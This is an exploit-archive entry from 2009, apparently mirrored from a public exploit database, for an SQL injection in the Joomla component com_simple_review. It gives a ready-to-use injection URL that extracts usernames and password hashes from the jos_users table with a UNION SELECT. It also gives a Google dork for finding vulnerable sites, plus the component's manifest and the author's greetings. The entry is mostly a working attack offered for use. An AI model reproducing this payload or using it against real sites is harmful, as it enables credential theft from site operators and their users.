[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component simple_review 1.x SQL Injection Vulnerability
# Published : 2009-01-05
# Author : EcHoLL
# Previous Title : Ayemsis Emlak Pro (Auth Bypass) SQL Injection Vulnerability
# Next Title : Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit
#Joomla com_simple_review Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous
#[!] Module_Name: com_simple_review
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_simple_review"
########################################
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
<name>simple_review</name>
<creationDate>29/05/2006</creationDate>
<author>Rowan Youngson</author>
<copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
<authorEmail> rowans@gmail.com </authorEmail>
<authorUrl>www.row1.info</authorUrl>
<version>1.3.5</version>
<description>Simple Review is a Review component for the Mambo CMS</description>
# www.Syue.com [2009-01-05]